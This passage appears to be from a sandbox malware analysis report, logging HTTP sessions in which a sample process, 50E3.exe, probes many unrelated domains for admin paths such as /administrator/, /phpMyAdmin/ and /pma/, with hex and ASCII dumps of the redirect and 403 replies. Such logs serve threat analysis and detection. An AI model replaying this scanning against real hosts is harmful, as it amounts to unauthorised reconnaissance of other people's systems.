Nov 30, 2023 11:22:37.828620911 CET	228	OUT	GET /administrator/ HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.180259943 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=222c8f6b-c030-4c0b-9d05-2464b2dacc4a; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:11 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	52914	15.197.172.60	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828620911 CET	222	OUT	GET /administrator/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:37.928309917 CET	929	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YLKJbENFD/VOrYF+0KsAjaeHhxFK2Px5gxbKZLO8+26zhlhsVf4uXMF33jpmvhJC/Hz/LdWGVdfOQsKtLSohXA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:38.066936970 CET	349	OUT	GET /administrator/index.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.132884979 CET	929	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YLKJbENFD/VOrYF+0KsAjaeHhxFK2Px5gxbKZLO8+26zhlhsVf4uXMF33jpmvhJC/Hz/LdWGVdfOQsKtLSohXA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:38.166595936 CET	938	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/administrator/index.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ArL9A9iZlgklnT1EKhJ3dMHLC90uBWepW7mE9bgjzCcGh2Rk33W6LWAykRWHtUT8XReFvRv4Ii2OVCk32T26iQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	52921	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828620911 CET	232	OUT	GET /administrator/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	52913	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828735113 CET	230	OUT	GET /administrator/ HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.177504063 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=65f6761b-83f1-4927-9f54-1ecf80cdf74e; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:10 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	52918	15.197.204.56	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828879118 CET	225	OUT	GET /administrator/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:37.929188967 CET	883	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_G0K/EcN1iIi7EB4u0B1Uw6B9nDXXAAHkwl9Eqj/lAKMktH1VwQ+/o/Dj+jmqWnU7ZHDEjy4rwW4IX2+RJPjYPQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:38.066993952 CET	303	OUT	GET /administrator/index.php HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.135241985 CET	883	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_G0K/EcN1iIi7EB4u0B1Uw6B9nDXXAAHkwl9Eqj/lAKMktH1VwQ+/o/Dj+jmqWnU7ZHDEjy4rwW4IX2+RJPjYPQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:38.167349100 CET	892	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/administrator/index.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_P6Vc8t1XFyZHBu3ZfZJ0d/mefbwbcezfXd6mx6/mt4bDSavjiU1oID6L/AoZwYetjS+rzyY3FB28nD5Fq7fxWg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	52920	194.63.248.47	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828885078 CET	225	OUT	GET /administrator/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.029850006 CET	540	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:37 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/administrator/ Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/administrator/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>
Nov 30, 2023 11:22:38.123382092 CET	234	OUT	GET /administrator/index.php HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.325112104 CET	558	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:38 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/administrator/index.php Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/administrator/index.php">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	55870	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.255299091 CET	235	OUT	GET /administrator/index.php HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	55871	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.255537987 CET	241	OUT	GET /administrator/index.php HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	57403	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.731086016 CET	225	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.845870018 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=a24e0a8b-6bd0-4b5a-8e58-e535b0ad3ad6; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:11 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	57484	216.37.42.12	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.810070992 CET	225	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.937995911 CET	495	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:38 GMT Server: Apache Location: https://www.noweco.com/phpMyAdmin/ Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 6f 77 65 63 6f 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.noweco.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	57547	15.197.204.56	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.812287092 CET	215	OUT	GET /pma/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.912664890 CET	873	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/pma/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_feNfcKYwzzKGzn9GC4BPIsWwVlhwUbwYtF5bnFNOH8L9xBxglPNh8TxUMQUqmL5MYzkZ4E2s6Xopgqyhx5S+1w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	57481	67.21.93.254	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.832303047 CET	220	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: il.cm Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.984796047 CET	358	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
